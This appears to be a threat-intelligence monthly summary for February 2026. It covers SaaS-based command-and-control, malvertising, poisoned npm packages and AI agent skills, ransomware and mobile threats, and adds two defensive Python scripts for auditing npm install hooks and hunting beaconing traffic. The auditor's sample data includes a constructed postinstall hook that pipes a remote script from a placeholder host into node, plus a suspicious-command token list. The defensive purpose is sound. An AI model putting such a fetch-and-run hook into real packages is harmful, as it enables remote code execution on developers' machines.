Monthly Wrap
Overview
February reinforced a consistent operational reality: attackers are gaining access and staying hidden by abusing trusted services and normal workflows more often than by relying on novel exploitation. This month featured stealthy “legitimate-functionality” tradecraft, including PRC-nexus abuse of the Google Sheets API for command-and-control (GRIDTIDE), commercialized Google Ads cloaking that routes real users to phishing or drainer infrastructure, and authenticated-looking spam delivered through Jira Cloud automation. At the same time, developer ecosystems remained a high-tempo intrusion path, with malicious npm and NuGet packages, repo-based lures, compromised extension publishers, and selective update-channel compromise creating execution risk during routine installs, builds, and updates. Ransomware and extortion activity continued to optimize for speed and resilience by leveraging cross-platform capabilities, offline-capable encryption modes, defense-disruption techniques, and increased use of legitimate remote management tooling for persistence. Finally, mobile threats expanded across banking fraud, spyware, and firmware-level compromise, while AI platforms and agent ecosystems emerged as both enabling infrastructure and high-value targets.
Key Trends Identified
- Trusted services are being repurposed as intrusion infrastructure: GRIDTIDE used the Google Sheets API as command-and-control to blend into routine SaaS traffic, while Jira Cloud automation enabled authenticated, platform-originated spam delivery. Commodity downloaders and campaigns continued leaning on mainstream cloud hosting for payload staging and retrieval, reducing the value of domain reputation alone.
- Malvertising and cloaking matured into a commercial enablement layer: 1Campaign operationalized Google Ads abuse by reliably presenting benign pages to reviewers while routing real users to phishing and drainer infrastructure. This model increases campaign lifespan and scale by suppressing researcher and scanner visibility through aggressive profiling and filtering.
- Developer ecosystems remained the fastest-moving supply chain risk: Malicious npm packages (ambar-src, buildrunner-dev) executed during installation through lifecycle scripts and escalated into multi-stage, in-memory RAT deployment with steganographic payload delivery. Repo-based lures using Next.js projects and coordinated NuGet packages targeting ASP[.]NET authorization flows reinforced that routine development actions can trigger compromise and downstream production risk.
- Update and marketplace trust continued to be a direct attack surface: The Open VSX registry incident showed how the compromise of a legitimate publisher identity can push weaponized updates to an established install base. Notepad++ update infrastructure compromise reinforced that selective, intelligence-driven tampering of update channels can bypass endpoint hardening when verification and signing controls are weak or inconsistently enforced.
- User-driven manual execution, obtained through social engineering, replaced exploit dependency in multiple chains: ClickFix-style fake verification prompts repeatedly converted a single user action into staged malware execution in enterprise environments. Parallel patterns targeted technical users through terminal paste lures and installer impersonation, including Homebrew-themed credential theft and follow-on stealer deployment.
- Ransomware operations optimized for resilience, cross-platform impact, and defense disruption: LockBit 5.0 expanded multi-platform capability with hypervisor-focused execution paths, while GLOBAL GROUP ransomware delivered via LNK chains ran in an offline-capable “mute” mode that does not require C2 connectivity. Pre-ransomware intrusion tradecraft also emphasized security control disruption, including BYOVD-style kernel-level EDR interference and persistent access via legitimate remote management tooling.
- Identity, session, and browser-resident access remained the primary monetization targets: MFA-intercept and session-capture phishing frameworks increased account takeover reliability, while ShinyHunters/SLH-style operations focused on stealing SSO credentials and MFA codes to enroll attacker devices for durable SaaS access. Malicious browser extensions and commodity stealers reinforced that cookies, tokens, and email content remain high-value for extortion, fraud, and lateral movement.
- AI platforms and agent ecosystems emerged as both tooling and target: Proof-of-concept research showed AI assistants with web-fetch can be coerced into covert C2 relay behavior, complicating detection by blending into normal AI usage patterns. In parallel, OpenClaw/ClawHub skill poisoning, log poisoning, and widespread internet-exposed agent control panels highlighted that misconfiguration and marketplace governance gaps can convert agentic automation into privileged compromise at scale.
- Mobile threats broadened across financial fraud, surveillance, and supply chain compromise: Android campaigns ranged from device-takeover banking trojans and AI-assisted persistence to mass-distributed RAT ecosystems spread through chat platforms. The mobile threat landscape also included commercially marketed cross-platform spyware and firmware-level backdoors embedded into system components, expanding risk beyond application-layer controls and persisting through resets.
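The npm bullet above notes that malicious packages executed at install time through lifecycle scripts. A practical pre-install check is to enumerate every install-time hook in a dependency tree and flag commands that look like download-and-execute loaders rather than native build steps. The following is an added example written for this wrap, not code from the report or from any project it names; the sample package tree, the package names, and the suspicious-token list are constructed assumptions for illustration.

```python
"""Audit a node_modules tree for npm lifecycle scripts that run during install.

Added example (not from the report). The sample packages below are constructed;
the token list is a heuristic, not an authoritative indicator set.
"""
import json
import tempfile
from pathlib import Path

# npm runs these hooks automatically while installing a dependency.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments that usually mean "fetch and run code" rather than a
# normal native build (node-gyp, prebuild-install, etc.). Assumed heuristic.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "node -e", "powershell", "base64", "eval(")


def find_lifecycle_scripts(root):
    """Return one finding per install-time hook found under root."""
    findings = []
    for manifest in sorted(Path(root).rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest; skip it
        scripts = data.get("scripts") or {}
        if not isinstance(scripts, dict):
            continue
        for hook in LIFECYCLE_HOOKS:
            cmd = scripts.get(hook)
            if not isinstance(cmd, str):
                continue
            findings.append({
                "package": data.get("name", manifest.parent.name),
                "hook": hook,
                "command": cmd,
                "suspicious": any(tok in cmd for tok in SUSPICIOUS_TOKENS),
                "path": str(manifest),
            })
    return findings


def build_sample_tree(root):
    """Write a constructed node_modules tree (fake packages, sample data only)."""
    packages = {
        # No scripts at all: nothing runs at install time.
        "plain-lib": {"name": "plain-lib", "version": "1.0.0"},
        # Legitimate-looking native build step.
        "native-addon": {"name": "native-addon", "version": "2.1.0",
                         "scripts": {"install": "node-gyp rebuild"}},
        # Constructed loader pattern: remote fetch piped into the interpreter.
        "fake-dev-tool": {"name": "fake-dev-tool", "version": "0.0.3",
                          "scripts": {"postinstall":
                                      "curl -s http://stage.example.invalid/l.js | node"}},
    }
    for name, manifest in packages.items():
        pkg_dir = Path(root) / "node_modules" / name
        pkg_dir.mkdir(parents=True, exist_ok=True)
        (pkg_dir / "package.json").write_text(json.dumps(manifest), encoding="utf-8")


def audit_sample():
    """Build the sample tree in a temp dir and audit it; returns the findings."""
    root = tempfile.mkdtemp(prefix="npm-audit-")
    build_sample_tree(root)
    return find_lifecycle_scripts(root)


if __name__ == "__main__":
    for f in audit_sample():
        flag = "SUSPICIOUS" if f["suspicious"] else "review"
        print(f"[{flag}] {f['package']} {f['hook']}: {f['command']}")
```

Running the script prints one line per hook so a reviewer can triage before a real `npm install`. A complementary control is to install with scripts disabled (`npm install --ignore-scripts`) and re-enable hooks only for the packages that genuinely need a native build.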
Threat Landscape Overview
Criminal operations in February 2026 concentrated on high-trust delivery paths and rapid data extraction. Campaigns repeatedly converted routine user and admin behavior into execution events, including malvertising cloaking (1Campaign), which extended the lifespan of Google Ads abuse; ClickFix-style “verification” prompts that drove direct command execution; and repository- and package-based lures that compromised developer endpoints during normal installs, builds, or local testing. Multiple intrusion chains emphasized stealth and resilience over novelty, relying on cloud-hosted staging, in-memory execution, and living-off-the-land tooling. Downstream impact continued to center on credential and session theft, ad-account and financial fraud, and ransomware enablement, including offline-capable encryption behavior (GLOBAL GROUP) and cross-platform targeting and hypervisor disruption (LockBit 5.0). Operator tradecraft also prioritized persistence through legitimate remote management tooling and defense impairment through kernel-level techniques, reinforcing that many intrusions are designed to progress quickly from initial access to enterprise-wide control.
State-aligned and espionage activity reinforced a parallel pattern: trusted services and edge visibility points are being weaponized to blend collection into normal traffic and workflows. PRC-nexus tradecraft demonstrated SaaS API abuse for command-and-control (GRIDTIDE via Google Sheets) and network choke-point targeting (DKnife on gateway devices) that can scale surveillance and delivery across multiple downstream endpoints. Iran-aligned activity used event-driven social engineering and modular implants to prioritize long-term access and credential theft, while North Korea-linked operations advanced quieter document-based delivery and, in a financially motivated track, showed increasing integration with established ransomware ecosystems. Broader reporting on defense industrial base targeting highlighted that compromise often begins outside traditional enterprise monitoring boundaries (workforce workflows, personal devices, suppliers, and internet-facing infrastructure) and then transitions to credential-driven access and low-noise collection through legitimate administrative paths.
Industries Targeted
- Government entities: Confirmed UNC2814 intrusions included government organizations across multiple regions, and additional activity reflected continued state-aligned focus on administrative access, credential theft, and low-noise collection rather than disruptive outcomes.
- Software development and software supply chain: Multiple February events directly targeted developer environments and build ecosystems, including malicious npm packages (ambar-src; buildrunner-dev), malicious Next.js repositories, coordinated NuGet packages that can alter ASP[.]NET authorization behavior, and a compromise of trusted extension distribution (Open VSX).
- Healthcare: North Korea-linked Lazarus subgroup activity operating through the Medusa ransomware ecosystem targeted U.S. healthcare providers, reinforcing the sector’s exposure to identity compromise, lateral movement, and high-pressure extortion.
- Defense industrial base and suppliers: Reporting highlighted expanding targeting of DIB ecosystems through hiring pipelines, contractor and personal devices, and supplier networks, increasing risk to program-sensitive data even when prime contractor networks are not directly exploited.
Most Active Threat Actors
- UNC2814 (PRC-nexus espionage): Ran a large-scale campaign using the GRIDTIDE backdoor with Google Sheets API–based command-and-control to blend activity into routine SaaS traffic, primarily targeting telecommunications providers and government entities across dozens of countries.
- ShinyHunters / “SLH”-labeled crews (eCrime, SaaS extortion): Continued identity-first SaaS intrusions built on SSO credential and MFA code theft, attacker-controlled device enrollment, bulk data access, and follow-on extortion with tightly managed negotiation pressure.
- GlassWorm (developer ecosystem, supply-chain abuse): Compromised a legitimate Open VSX publisher identity and pushed weaponized updates that used staged loaders and blockchain-based instruction retrieval, with macOS stealer payloads focused on developer and cloud secrets.
- ClawHavoc / ClawHub malicious-skill operators (AI agent ecosystem): Flooded OpenClaw skill marketplaces with trojanized skills and documentation-driven prerequisite lures to deliver macOS stealers and exfiltrate agent configuration secrets, adapting toward off-platform payload delivery to evade registry defenses.
- DKnife operator (China-nexus, edge-device compromise): Deployed a gateway-resident interception toolkit to observe and alter network traffic at choke points, enabling credential theft and malware delivery upstream of endpoints.
Hunter Insights
February’s activity shows a structurally shifting threat landscape in which “legitimate-functionality abuse” is outpacing novel exploits, meaning defenders must assume cloud APIs, SaaS workflows, and update channels are already hostile terrain. Intrusions are increasingly routed through trusted surfaces (Google Sheets C2 in GRIDTIDE, commercial cloaking for malvertising in 1Campaign, developer package ecosystems, and remote-management tooling), while ransomware, identity-centric extortion, and mobile spyware rapidly convert short dwell time into maximum leverage against government, healthcare, software, and DIB targets. At the same time, AI agent marketplaces and skills (OpenClaw/ClawHub) have become both tooling and target, with large-scale skill poisoning and prompt-injection-driven malware delivery demonstrating that “agent supply chain” risk is now on par with npm, NuGet, and extension registries. Collectively, these trends point to a world where compromise often begins outside traditional perimeter visibility (ads, skills, updates, mobile firmware) and then pivots to low-noise credential and session theft for durable SaaS and cloud access.
Looking forward, defenders should expect three reinforcing trajectories: first, wider adoption of API- and SaaS-native C2 (beyond Google Sheets) combined with marketplace cloaking services that industrialize “never-see-the-real-site” malvertising; second, escalating weaponization of AI ecosystems, where poisoned skills, exposed agent panels, and coerced web-enabled assistants serve as both initial access and stealthy relays; and third, deeper convergence of identity and ransomware operations, with session hijacking, MFA interception, and browser-resident theft feeding cross-platform, hypervisor-aware lockers that operate even in offline or segmented environments. To stay ahead, organizations will need to pivot from perimeter-centric controls toward continuous cloud/API telemetry, developer and AI-supply-chain vetting, strong update and identity assurance (FIDO-class phishing-resistant auth, hardened signing), and threat hunting explicitly tuned to detect abuse of “normal” services rather than only anomalous infrastructure.
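The closing recommendation, hunting for abuse of “normal” services rather than only anomalous infrastructure, can be made concrete. GRIDTIDE’s Google Sheets API command-and-control blends into routine SaaS traffic by destination, but implant check-ins still tend to arrive on a regular timer, which browsers and humans do not produce. The following is an added example written for this wrap, not code from the report or from any vendor it cites: it parses constructed proxy log lines, groups requests by source and destination, and scores the regularity of inter-request intervals. The log format, the thresholds, and the sample hosts and user agents are all assumptions.

```python
"""Beaconing hunt over proxy logs for SaaS API destinations.

Added example (not from the report). Log format, thresholds, and every line in
SAMPLE_LOG are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Assumed format: "<ISO-8601 UTC timestamp> <src_ip> <dest_host> <user_agent>"
SAMPLE_LOG = """\
2026-02-10T09:00:00Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:00:05Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T09:00:09Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T09:01:01Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:01:59Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:03:00Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:04:02Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:04:58Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:06:00Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:07:01Z 10.0.0.12 sheets.googleapis.com Go-http-client/1.1
2026-02-10T09:12:40Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T09:13:02Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T09:30:00Z 10.0.0.7 drive.googleapis.com Go-http-client/1.1
2026-02-10T09:41:15Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T09:41:16Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T10:05:30Z 10.0.0.44 sheets.googleapis.com Mozilla/5.0 (Windows NT 10.0) Chrome/122
2026-02-10T10:30:00Z 10.0.0.7 drive.googleapis.com Go-http-client/1.1
"""


def parse_log(text):
    """Yield (timestamp, src_ip, dest_host, user_agent) tuples from log text."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dest, ua = line.split(maxsplit=3)
        yield datetime.fromisoformat(ts.replace("Z", "+00:00")), src, dest, ua


def hunt_beacons(log_text, min_requests=6, max_cv=0.2):
    """Flag (src, dest) pairs whose request timing is suspiciously regular.

    Regularity is measured as the coefficient of variation (stdev / mean) of the
    inter-request intervals; a low value means a timer, not a person.
    """
    groups = defaultdict(list)
    for ts, src, dest, ua in parse_log(log_text):
        groups[(src, dest, ua)].append(ts)

    findings = []
    for (src, dest, ua), stamps in groups.items():
        if len(stamps) < min_requests:
            continue  # too few samples to judge periodicity
        stamps.sort()
        intervals = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(intervals)
        if avg <= 0:
            continue
        cv = pstdev(intervals) / avg
        if cv <= max_cv:
            findings.append({
                "src": src,
                "dest": dest,
                "user_agent": ua,
                "requests": len(stamps),
                "mean_interval_s": round(avg, 1),
                "cv": round(cv, 3),
                # Non-browser agents talking to a browser-oriented SaaS API
                # deserve a closer look; legitimate sync agents do exist, so this
                # is a triage hint, not a verdict.
                "browser_like": ua.startswith("Mozilla/"),
            })
    return sorted(findings, key=lambda f: f["cv"])


if __name__ == "__main__":
    for f in hunt_beacons(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dest']} every ~{f['mean_interval_s']}s "
              f"(cv={f['cv']}, n={f['requests']}, ua={f['user_agent']})")
```

On the constructed sample, only the host with roughly 60-second check-ins from a non-browser client is reported; the interactive browser session to the same destination is not, because its intervals vary by orders of magnitude. In production the destination set would be the SaaS APIs the organization already permits, and the mean interval and user agent feed endpoint triage (which process owns the connection, and whether that host should be using that API at all).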